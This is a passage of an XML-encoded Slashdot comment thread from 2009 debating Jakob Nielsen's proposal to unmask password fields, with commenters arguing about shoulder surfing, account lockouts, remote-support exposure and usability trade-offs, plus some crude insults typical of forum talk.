	<htmltext>One step easier for son/daughter/niece/nephew/younger sibling to take out your shiny new convertible for a joy ride.</htmltext>
<tokenext>One step easier for son/daughter/niece/nephew/younger sibling to take out your shiny new convertible for a joy ride .</tokentext>
<sentencetext>One step easier for son/daughter/niece/nephew/younger sibling to take out your shiny new convertible for a joy ride.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471347</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470923</id>
	<title>idiot</title>
	<author>martas</author>
	<datestamp>1245963120000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>does he ever type his password in front of other people?</htmltext>
<tokenext>does he ever type his password in front of other people ?</tokentext>
<sentencetext>does he ever type his password in front of other people?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28481791</id>
	<title>speed typing passwords becomes useful?</title>
	<author>Anonymous</author>
	<datestamp>1246029060000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Finally the hours I spent practicing typing my password in the least amount of time possible will pay off!</p></htmltext>
<tokenext>Finally the hours I spent practicing typing my password in the least amount of time possible will pay off !</tokentext>
<sentencetext>Finally the hours I spent practicing typing my password in the least amount of time possible will pay off!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471453</id>
	<title>This guy ..</title>
	<author>n3v</author>
	<datestamp>1245921600000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>.. should probably not leave his day job - EVER.</p><p>I can't believe this even got on slashdot..</p></htmltext>
<tokenext>.. should probably not leave his day job - EVER.I ca n't believe this even got on slashdot. .</tokentext>
<sentencetext>.. should probably not leave his day job - EVER.I can't believe this even got on slashdot..</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474525</id>
	<title>Re:hunter2</title>
	<author>un1xl0ser</author>
	<datestamp>1245933000000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>Good security involves locking out the user after a certain number of attempts in order to stop a "dictionary attack". I just had to reset a users PW twice this afternoon because she locked herself out of her account. Sure, it's extra hassle but the security is worth it.</p></div><p>Unchecked, and with low thresholds, this can make it easy for a malicious person to deny service to valid users. Blocking requests from that particular IP address is a far safer option. Introducing long delays before authentication can be attempted again could also be used.</p><p>If you think that you are adding to security by locking out users that types the password in 5 times, 10 times, or maybe even 100 times, you are fooling yourself. If you require strong passwords (e.g. 3 classes, at least 8 characters), there is no way anyone is going to do an online dictionary attempt with that few amount of tries.</p></div>
	</htmltext>
<tokenext>Good security involves locking out the user after a certain number of attempts in order to stop a " dictionary attack " .
I just had to reset a users PW twice this afternoon because she locked herself out of her account .
Sure , it 's extra hassle but the security is worth it.Unchecked , and with low thresholds , this can make it easy for a malicious person to deny service to valid users .
Blocking requests from that particular IP address is a far safer option .
Introducing long delays before authentication can be attempted again could also be used.If you think that you are adding to security by locking out users that types the password in 5 times , 10 times , or maybe even 100 times , you are fooling yourself .
If you require strong passwords ( e.g .
3 classes , at least 8 characters ) , there is no way anyone is going to do an online dictionary attempt with that few amount of tries .</tokentext>
<sentencetext>Good security involves locking out the user after a certain number of attempts in order to stop a "dictionary attack".
I just had to reset a users PW twice this afternoon because she locked herself out of her account.
Sure, it's extra hassle but the security is worth it.Unchecked, and with low thresholds, this can make it easy for a malicious person to deny service to valid users.
Blocking requests from that particular IP address is a far safer option.
Introducing long delays before authentication can be attempted again could also be used.If you think that you are adding to security by locking out users that types the password in 5 times, 10 times, or maybe even 100 times, you are fooling yourself.
If you require strong passwords (e.g.
3 classes, at least 8 characters), there is no way anyone is going to do an online dictionary attempt with that few amount of tries.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28490431</id>
	<title>Screen capture software?</title>
	<author>Anonymous</author>
	<datestamp>1246026120000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>so you unmask the password and now you have to make software that detects keylogggers AND any software that can do a quick screen cap...  theres a reason this guy isnt in charge...</p></htmltext>
<tokenext>so you unmask the password and now you have to make software that detects keylogggers AND any software that can do a quick screen cap... theres a reason this guy isnt in charge.. .</tokentext>
<sentencetext>so you unmask the password and now you have to make software that detects keylogggers AND any software that can do a quick screen cap...  theres a reason this guy isnt in charge...</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477341</id>
	<title>Wanker never owned a password before.</title>
	<author>Anonymous</author>
	<datestamp>1245950100000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Has this doofus actually ever mistyped a password?? I don't look to see where my mistake was, then key over to it and fix it... I blow it all away and start over. Much quicker, and removes the need to see it.</p><p>Question 2: Has this doofus ever owned a password?? Does he not get cold sweats for a brief moment anytime he accidentally sees the letters? I see mine so rarely I don't even recognize it at first. Then the shock sets in and I kill it asap, before scanning the room to see who saw.</p></htmltext>
<tokenext>Has this doofus actually ever mistyped a password ? ?
I do n't look to see where my mistake was , then key over to it and fix it... I blow it all away and start over .
Much quicker , and removes the need to see it.Question 2 : Has this doofus ever owned a password ? ?
Does he not get cold sweats for a brief moment anytime he accidentally sees the letters ?
I see mine so rarely I do n't even recognize it at first .
Then the shock sets in and I kill it asap , before scanning the room to see who saw .</tokentext>
<sentencetext>Has this doofus actually ever mistyped a password??
I don't look to see where my mistake was, then key over to it and fix it... I blow it all away and start over.
Much quicker, and removes the need to see it.Question 2: Has this doofus ever owned a password??
Does he not get cold sweats for a brief moment anytime he accidentally sees the letters?
I see mine so rarely I don't even recognize it at first.
Then the shock sets in and I kill it asap, before scanning the room to see who saw.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480301</id>
	<title>Among the other things he's missing...</title>
	<author>Anonymous</author>
	<datestamp>1246022580000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Your coworker seeing over your shoulder is one thing. Remote assistance sessions are another. I routinely use remote access sessions to assist customers, and users often need to log on to websites or other programs for which I need not know the password. The passwords showing up in cleartext visible to me just introduces needless risk and mistrust. I don't WANT to know a user's password. It's suspicion I can do without.</p></htmltext>
<tokenext>Your coworker seeing over your shoulder is one thing .
Remote assistance sessions are another .
I routinely use remote access sessions to assist customers , and users often need to log on to websites or other programs for which I need not know the password .
The passwords showing up in cleartext visible to me just introduces needless risk and mistrust .
I do n't WANT to know a user 's password .
It 's suspicion I can do without .</tokentext>
<sentencetext>Your coworker seeing over your shoulder is one thing.
Remote assistance sessions are another.
I routinely use remote access sessions to assist customers, and users often need to log on to websites or other programs for which I need not know the password.
The passwords showing up in cleartext visible to me just introduces needless risk and mistrust.
I don't WANT to know a user's password.
It's suspicion I can do without.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472987</id>
	<title>DAMMIT!!!!`</title>
	<author>dandart</author>
	<datestamp>1245926700000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>FIIINGERPRIIIIINTS!!!!! EEEYEEES!!!!

Just don't use the damn passwords if they're that much trouble. Get a fingerprint reader or USB key auth or iris detection!

Bloody hell, I'd have thought someone would have thought of this already!</htmltext>
<tokenext>FIIINGERPRIIIIINTS ! ! ! ! !
EEEYEEES ! ! ! ! Just do n't use the damn passwords if they 're that much trouble .
Get a fingerprint reader or USB key auth or iris detection !
Bloody hell , I 'd have thought someone would have thought of this already !</tokentext>
<sentencetext>FIIINGERPRIIIIINTS!!!!!
EEEYEEES!!!!

Just don't use the damn passwords if they're that much trouble.
Get a fingerprint reader or USB key auth or iris detection!
Bloody hell, I'd have thought someone would have thought of this already!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472119</id>
	<title>wtf</title>
	<author>Anonymous</author>
	<datestamp>1245923520000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>at first I just closed the tab out of disgust, but then decided it needed my comment - kiss my ass JN - you're just trying to garnish publicity - I hope you die sucking ahmadinejad's cock.</p></htmltext>
<tokenext>at first I just closed the tab out of disgust , but then decided it needed my comment - kiss my ass JN - you 're just trying to garnish publicity - I hope you die sucking ahmadinejad 's cock .</tokentext>
<sentencetext>at first I just closed the tab out of disgust, but then decided it needed my comment - kiss my ass JN - you're just trying to garnish publicity - I hope you die sucking ahmadinejad's cock.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471265</id>
	<title>Re:Two words</title>
	<author>rtfa-troll</author>
	<datestamp>1245921000000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>5</modscore>
	<htmltext><p>Sure, being the RTFA troll, I read the article.  But that still doesn't convince me.  The keyboard press is a brief instant on a device which is easy to place more or less out of line of sight.  A visible password on a screen is present for a long time and there are a <a href="http://www.schneier.com/blog/archives/2008/05/spying\_on\_compu.html" title="schneier.com">number</a> [schneier.com] of <a href="http://www.newscientist.com/blog/technology/2007/04/seeing-through-walls.html" title="newscientist.com">interesting</a> [newscientist.com] ways to capture this.  Whilst <a href="http://www.itworld.com/security/64193/researchers-find-ways-sniff-keystrokes-thin-air" title="itworld.com">keyboards are not perfect</a> [itworld.com] I think that some protection is worthwhile.  One thing is for sure.  Nobody is going to remember to turn this on when they are in public and your password only needs to be captured once.</p><p>One thing that might be a possible compromise is the system the mail client on my Nokia phone uses.  The most recent character entered in the password is displayed for a short time.  I can see each individual character, but the entire password is not exposed.  I worry on the subway, but since it's a personal device it's easier to make this difficult to see.</p></htmltext>
<tokenext>Sure , being the RTFA troll , I read the article .
But that still does n't convince me .
The keyboard press is a brief instant on a device which is easy to place more or less out of line of sight .
A visible password on a screen is present for a long time and there are a number [ schneier.com ] of interesting [ newscientist.com ] ways to capture this .
Whilst keyboards are not perfect [ itworld.com ] I think that some protection is worthwhile .
One thing is for sure .
Nobody is going to remember to turn this on when they are in public and your password only needs to be captured once.One thing that might be a possible compromise is the system the mail client on my Nokia phone uses .
The most recent character entered in the password is displayed for a short time .
I can see each individual character , but the entire password is not exposed .
I worry on the subway , but since it 's a personal device it 's easier to make this difficult to see .</tokentext>
<sentencetext>Sure, being the RTFA troll, I read the article.
But that still doesn't convince me.
The keyboard press is a brief instant on a device which is easy to place more or less out of line of sight.
A visible password on a screen is present for a long time and there are a number [schneier.com] of interesting [newscientist.com] ways to capture this.
Whilst keyboards are not perfect [itworld.com] I think that some protection is worthwhile.
One thing is for sure.
Nobody is going to remember to turn this on when they are in public and your password only needs to be captured once.One thing that might be a possible compromise is the system the mail client on my Nokia phone uses.
The most recent character entered in the password is displayed for a short time.
I can see each individual character, but the entire password is not exposed.
I worry on the subway, but since it's a personal device it's easier to make this difficult to see.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471569</id>
	<title>Re:hunter2</title>
	<author>lgw</author>
	<datestamp>1245921960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>That will work even WITH masked passwords, which I found out when a woman watched me use my debit card.</p> </div><p>The polite thing to do in that situation is to "accidentally" elbow them in the nose, and enter your PIN while their eyes are watering and they can't see straight.  Asking them to back up would be rude!</p></div>
	</htmltext>
<tokenext>That will work even WITH masked passwords , which I found out when a woman watched me use my debit card .
The polite thing to do in that situation is to " accidentally " elbow them in the nose , and enter your PIN while their eyes are watering and they ca n't see straight .
Asking them to back up would be rude !</tokentext>
<sentencetext>That will work even WITH masked passwords, which I found out when a woman watched me use my debit card.
The polite thing to do in that situation is to "accidentally" elbow them in the nose, and enter your PIN while their eyes are watering and they can't see straight.
Asking them to back up would be rude!
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013</id>
	<title>Re:Two words</title>
	<author>tomhudson</author>
	<datestamp>1245963420000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>
I'd rather have to retype the occasional password than have it visible to anyone shoulder surfing.
</p><p>
Think about your bank card, your PIN, etc.
</p><p>
FTFA:</p><blockquote><div><p>It's therefore worth <b>offering them a checkbox to have their passwords masked; for high-risk applications, such as bank accounts, you might even check this box by default</b>. In cases where there's a tension between security and usability, <b>sometimes</b> security should win.</p></div>
</blockquote><p>
Retarded doesn't begin to cover this.  Offering a default to turn OFF password masking for bank accounts?  I'm sure the banks will just LOVE this one.  We have enough problems with identity theft already.</p></div>
	</htmltext>
<tokenext>I 'd rather have to retype the occasional password than have it visible to anyone shoulder surfing .
Think about your bank card , your PIN , etc .
FTFA : It 's therefore worth offering them a checkbox to have their passwords masked ; for high-risk applications , such as bank accounts , you might even check this box by default .
In cases where there 's a tension between security and usability , sometimes security should win .
Retarded does n't begin to cover this .
Offering a default to turn OFF password masking for bank accounts ?
I 'm sure the banks will just LOVE this one .
We have enough problems with identity theft already .</tokentext>
<sentencetext>
I'd rather have to retype the occasional password than have it visible to anyone shoulder surfing.
Think about your bank card, your PIN, etc.
FTFA:It's therefore worth offering them a checkbox to have their passwords masked; for high-risk applications, such as bank accounts, you might even check this box by default.
In cases where there's a tension between security and usability, sometimes security should win.
Retarded doesn't begin to cover this.
Offering a default to turn OFF password masking for bank accounts?
I'm sure the banks will just LOVE this one.
We have enough problems with identity theft already.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471675</id>
	<title>Re:hunter2</title>
	<author>plague3106</author>
	<datestamp>1245922320000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p><i>If Stephen Hawking says something about physics, do you require a citation from him? Nielson is recognized as one of the leading experts in his field.</i></p><p>Not at all.  But I wouldn't listen to his ideas on beating the Taliban in Afganistan.</p></htmltext>
<tokenext>If Stephen Hawking says something about physics , do you require a citation from him ?
Nielson is recognized as one of the leading experts in his field.Not at all .
But I would n't listen to his ideas on beating the Taliban in Afganistan .</tokentext>
<sentencetext>If Stephen Hawking says something about physics, do you require a citation from him?
Nielson is recognized as one of the leading experts in his field.Not at all.
But I wouldn't listen to his ideas on beating the Taliban in Afganistan.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478845</id>
	<title>Re:its not a problem for me</title>
	<author>snowgirl</author>
	<datestamp>1246049880000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>i can type my password without even looking</p><p>watch, i'll enter my bank account password without looking</p><p>fluffybunnies</p><p>see? i didn't even need to...</p><p>oh crap...</p><p>unsubmit</p><p>where's the damn unsubmit!</p></div><p>Your bank password is the same as my BIOS password... oh wait, no, I used "sillyrabbit" for my BIOS password.</p><p>I actually ran up against someone who used the same password for their BIOS.</p><p>I knew a guy in college, who was a security specialist, and at one point, another guy from our college managed to get his passwd file, and ran a simple dictionary crack on it, and got the root password.  The other guy laughed and teased the security specialist about it, because he couldn't believe that the security specialist would use such a simple password for his root password.</p><p>The security specialist pointed out that the password was only found to be a simple dictionary word after already obtaining the passwd file, which required root access in the first place.  He pointed out, that putting the key to a safe in the safe is not a security vulnerability.</p></div>
	</htmltext>
<tokenext>i can type my password without even lookingwatch , i 'll enter my bank account password without lookingfluffybunniessee ?
i did n't even need to...oh crap...unsubmitwhere 's the damn unsubmit ! Your bank password is the same as my BIOS password... oh wait , no , I used " sillyrabbit " for my BIOS password.I actually ran up against someone who used the same password for their BIOS.I knew a guy in college , who was a security specialist , and at one point , another guy from our college managed to get his passwd file , and ran a simple dictionary crack on it , and got the root password .
The other guy laughed and teased the security specialist about it , because he could n't believe that the security specialist would use such a simple password for his root password.The security specialist pointed out that the password was only found to be a simple dictionary word after already obtaining the passwd file , which required root access in the first place .
He pointed out , that putting the key to a safe in the safe is not a security vulnerability .</tokentext>
<sentencetext>i can type my password without even lookingwatch, i'll enter my bank account password without lookingfluffybunniessee?
i didn't even need to...oh crap...unsubmitwhere's the damn unsubmit!Your bank password is the same as my BIOS password... oh wait, no, I used "sillyrabbit" for my BIOS password.I actually ran up against someone who used the same password for their BIOS.I knew a guy in college, who was a security specialist, and at one point, another guy from our college managed to get his passwd file, and ran a simple dictionary crack on it, and got the root password.
The other guy laughed and teased the security specialist about it, because he couldn't believe that the security specialist would use such a simple password for his root password.The security specialist pointed out that the password was only found to be a simple dictionary word after already obtaining the passwd file, which required root access in the first place.
He pointed out, that putting the key to a safe in the safe is not a security vulnerability.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471349</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478229</id>
	<title>Re:Two words</title>
	<author>Anonymous</author>
	<datestamp>1245958320000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>When many of these security conventions were established, people were using terminal rooms sitting right next to each other and some were even using paper-based teletype terminals (pre-dated CRT) so everything "outputed" by the login program would actually be committed to hard-copy that was piling up behind the terminal.  That is the <i>real</i> reason passwords were not echoed back to the output traditionally.</p></htmltext>
<tokenext>When many of these security conventions were established , people were using terminal rooms sitting right next to each other and some were even using paper-based teletype terminals ( pre-dated CRT ) so everything " outputed " by the login program would actually be committed to hard-copy that was piling up behind the terminal .
That is the real reason passwords were not echoed back to the output traditionally .</tokentext>
<sentencetext>When many of these security conventions were established, people were using terminal rooms sitting right next to each other and some were even using paper-based teletype terminals (pre-dated CRT) so everything "outputed" by the login program would actually be committed to hard-copy that was piling up behind the terminal.
That is the real reason passwords were not echoed back to the output traditionally.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471191</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472913</id>
	<title>Re:One word for Nielsen: Projector</title>
	<author>Archimonde</author>
	<datestamp>1245926400000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext><p>I've seen it.</p><p>There was this guy wanting to do a presentation in front of around 50 people on a ubuntu laptop and he typed his password in the "User" textedit of login window. Everyone erupted with laughter because his password was "jebenica\_l01" (something like fuckery lol in english). I don't blame him too much, that login window has serious flaw with showing only one textedit at the time and both of them in the same place which can lead to situation like this when people are under pressure. Needless to say, the guy was red in the face and stuttering horribly the whole time.</p></htmltext>
<tokenext>I 've seen it.There was this guy wanting to do a presentation in front of around 50 people on a ubuntu laptop and he typed his password in the " User " textedit of login window .
Everyone erupted with laughter because his password was " jebenica \ _l01 " ( something like fuckery lol in english ) .
I do n't blame him too much , that login window has serious flaw with showing only one textedit at the time and both of them in the same place which can lead to situation like this when people are under pressure .
Needless to say , the guy was red in the face and stuttering horribly the whole time .</tokentext>
<sentencetext>I've seen it.There was this guy wanting to do a presentation in front of around 50 people on a ubuntu laptop and he typed his password in the "User" textedit of login window.
Everyone erupted with laughter because his password was "jebenica\_l01" (something like fuckery lol in english).
I don't blame him too much, that login window has serious flaw with showing only one textedit at the time and both of them in the same place which can lead to situation like this when people are under pressure.
Needless to say, the guy was red in the face and stuttering horribly the whole time.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471575</id>
	<title>Re:Two words</title>
	<author>KingPin27</author>
	<datestamp>1245921960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>
from personal experience working on the hell desk; even if we did give users the option to unmask their password chances are they wouldn't remember it anyway.
<br>
why not just give them a checkbox that says <b>Password Optional</b></p></htmltext>
<tokenext>from personal experience working on the hell desk ; even if we did give users the option to unmask their password chances are they would n't remember it anyway .
why not just give them a checkbox that says Password Optional</tokentext>
<sentencetext>
from personal experience working on the hell desk; even if we did give users the option to unmask their password chances are they wouldn't remember it anyway.
why not just give them a checkbox that says Password Optional</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473197</id>
	<title>Firefox password save??</title>
	<author>Gooner\_14</author>
	<datestamp>1245927480000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Firefox saves passwords!!!! - Now that is usability. Of course if you're on a public computer or work computer you will not save your password, and as many have stated you need to mask you password in a public environment. My personal computer, at home, only I use, so I get firefox to save my passwords so I only type it once per password, it's masked and most important I don't suffer from incorrect logins.</htmltext>
<tokenext>Firefox saves passwords ! ! ! !
- Now that is usability .
Of course if you 're on a public computer or work computer you will not save your password , and as many have stated you need to mask you password in a public environment .
My personal computer , at home , only I use , so I get firefox to save my passwords so I only type it once per password , it 's masked and most important I do n't suffer from incorrect logins .</tokentext>
<sentencetext>Firefox saves passwords!!!!
- Now that is usability.
Of course if you're on a public computer or work computer you will not save your password, and as many have stated you need to mask you password in a public environment.
My personal computer, at home, only I use, so I get firefox to save my passwords so I only type it once per password, it's masked and most important I don't suffer from incorrect logins.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472307</id>
	<title>Re:hunter2</title>
	<author>Stewie241</author>
	<datestamp>1245924240000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>If someone can't remember 6-8 characters with a number thrown in there for good measure, perhaps they should not be on the internet.</p></div><p>Well...  one 6-8 character password is fine...  but as I look through my password safe, I see I have stored roughly 80-100 passwords.  Some are used rather frequently, and so get remembered.  Others are used quite seldom, and so the task of remembering not only the passwords, but which password belongs to which site can become quite onerous.</p></div>
	</htmltext>
<tokenext>If someone ca n't remember 6-8 characters with a number thrown in there for good measure , perhaps they should not be on the internet.Well... one 6-8 character password is fine... but as I look through my password safe , I see I have stored roughly 80-100 passwords .
Some are used rather frequently , and so get remembered .
Others are used quite seldom , and so the task of remembering not only the passwords , but which password belongs to which site can become quite onerous .</tokentext>
<sentencetext>If someone can't remember 6-8 characters with a number thrown in there for good measure, perhaps they should not be on the internet.Well...  one 6-8 character password is fine...  but as I look through my password safe, I see I have stored roughly 80-100 passwords.
Some are used rather frequently, and so get remembered.
Others are used quite seldom, and so the task of remembering not only the passwords, but which password belongs to which site can become quite onerous.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471005</id>
	<title>Security vs usability</title>
	<author>rwalker429</author>
	<datestamp>1245963360000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Isn't security always a balancing act against usability?  The inconvenience of not being able to read a password as you type seems pretty minimal when weighed against the damage that could be caused when some mildly educated user I pissed off swipes my password by taking a look over my shoulder one day and decides to get even.  And I'm pretty sure you could just as easily lose a client whose accounts were so easily compromised...as well as rack up some pretty epic fines in civil litigation if the circumstances are right.  Don't we have more important security issues to be debating these days?</htmltext>
<tokenext>Is n't security always a balancing act against usability ?
The inconvenience of not being able to read a password as you type seems pretty minimal when weighed against the damage that could be caused when some mildly educated user I pissed off swipes my password by taking a look over my shoulder one day and decides to get even .
And I 'm pretty sure you could just as easily lose a client whose accounts were so easily compromised...as well as rack up some pretty epic fines in civil litigation if the circumstances are right .
Do n't we have more important security issues to be debating these days ?</tokentext>
<sentencetext>Isn't security always a balancing act against usability?
The inconvenience of not being able to read a password as you type seems pretty minimal when weighed against the damage that could be caused when some mildly educated user I pissed off swipes my password by taking a look over my shoulder one day and decides to get even.
And I'm pretty sure you could just as easily lose a client whose accounts were so easily compromised...as well as rack up some pretty epic fines in civil litigation if the circumstances are right.
Don't we have more important security issues to be debating these days?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473285</id>
	<title>Re:Two words</title>
	<author>Twanfox</author>
	<datestamp>1245927900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Two more words:</p><p>Remote Assistance</p><p>As a technician supporting my users, I am often remotely connected to the user's workstation. I see what they see, and while I might not get their Window's logon password with some remote tools, I sure as hell might accidentally see their application passwords, or passwords as they access a site while I'm trying to assist them with their problem. These are pieces of information that I really just Do Not Want to know. If I don't know it, it would be harder to hold me accountable for problems that come up.</p></htmltext>
<tokenext>Two more words : Remote AssistanceAs a technician supporting my users , I am often remotely connected to the user 's workstation .
I see what they see , and while I might not get their Window 's logon password with some remote tools , I sure as hell might accidentally see their application passwords , or passwords as they access a site while I 'm trying to assist them with their problem .
These are pieces of information that I really just Do Not Want to know .
If I do n't know it , it would be harder to hold me accountable for problems that come up .</tokentext>
<sentencetext>Two more words:Remote AssistanceAs a technician supporting my users, I am often remotely connected to the user's workstation.
I see what they see, and while I might not get their Window's logon password with some remote tools, I sure as hell might accidentally see their application passwords, or passwords as they access a site while I'm trying to assist them with their problem.
These are pieces of information that I really just Do Not Want to know.
If I don't know it, it would be harder to hold me accountable for problems that come up.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473867</id>
	<title>Better solution</title>
	<author>Anonymous</author>
	<datestamp>1245930600000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Instead of echoing asterisk characters, the system should echo a random letter or number for each keystroke.</p></htmltext>
<tokenext>Instead of echoing asterisk characters , the system should echo a random letter or number for each keystroke .</tokentext>
<sentencetext>Instead of echoing asterisk characters, the system should echo a random letter or number for each keystroke.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478477</id>
	<title>Re:hunter2</title>
	<author>julesh</author>
	<datestamp>1246046760000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><i>&gt; Well, I'm glad they found such an unbiased and informed person to make such a statement about security versus usability</i></p><p><i>He's not a security expert, but he IS a useability expert </i></p><p>In order to make this kind of statement with any authority, he'd need to be both.</p><p><i>[Over-the-shoulder-attacks] will work even WITH masked passwords [...]. In the case of ATMs, masking it "security theater".</i></p><p>It is perfectly possible to protect against somebody attempting to watch the keypad.  One merely needs to place another hand over the one that is typing.  To also block out the screen would not be so easy.</p><p><i>Nielson is recognized as one of the leading experts in his field.</i></p><p>By whom? I know professional HCI researchers who basically consider him an outspoken ass.  He has a reputation in the field of going too far with almost everything he says, rejecting every compromise in favour of the extreme.  That he gets most press attention does not make him a leading expert of the field.</p></htmltext>
<tokenext>&gt; Well , I 'm glad they found such an unbiased and informed person to make such a statement about security versus usabilityHe 's not a security expert , but he IS a useability expert In order to make this kind of statement with any authority , he 'd need to be both .
[ Over-the-shoulder-attacks ] will work even WITH masked passwords [ ... ] .
In the case of ATMs , masking it " security theater " .It is perfectly possible to protect against somebody attempting to watch the keypad .
One merely needs to place another hand over the one that is typing .
To also block out the screen would not be so easy.Nielson is recognized as one of the leading experts in his field.By whom ?
I know professional HCI researchers who basically consider him an outspoken ass .
He has a reputation in the field of going too far with almost everything he says , rejecting every compromise in favour of the extreme .
That he gets most press attention does not make him a leading expert of the field .</tokentext>
<sentencetext>&gt; Well, I'm glad they found such an unbiased and informed person to make such a statement about security versus usabilityHe's not a security expert, but he IS a useability expert In order to make this kind of statement with any authority, he'd need to be both.
[Over-the-shoulder-attacks] will work even WITH masked passwords [...].
In the case of ATMs, masking it "security theater".It is perfectly possible to protect against somebody attempting to watch the keypad.
One merely needs to place another hand over the one that is typing.
To also block out the screen would not be so easy.Nielson is recognized as one of the leading experts in his field.By whom?
I know professional HCI researchers who basically consider him an outspoken ass.
He has a reputation in the field of going too far with almost everything he says, rejecting every compromise in favour of the extreme.
That he gets most press attention does not make him a leading expert of the field.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471797</id>
	<title>Re:Utterly absurd!</title>
	<author>Anonymous</author>
	<datestamp>1245922680000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext>I would hope that most eight-year-olds haven't been exposed to the kind of language I use in my passwords.</htmltext>
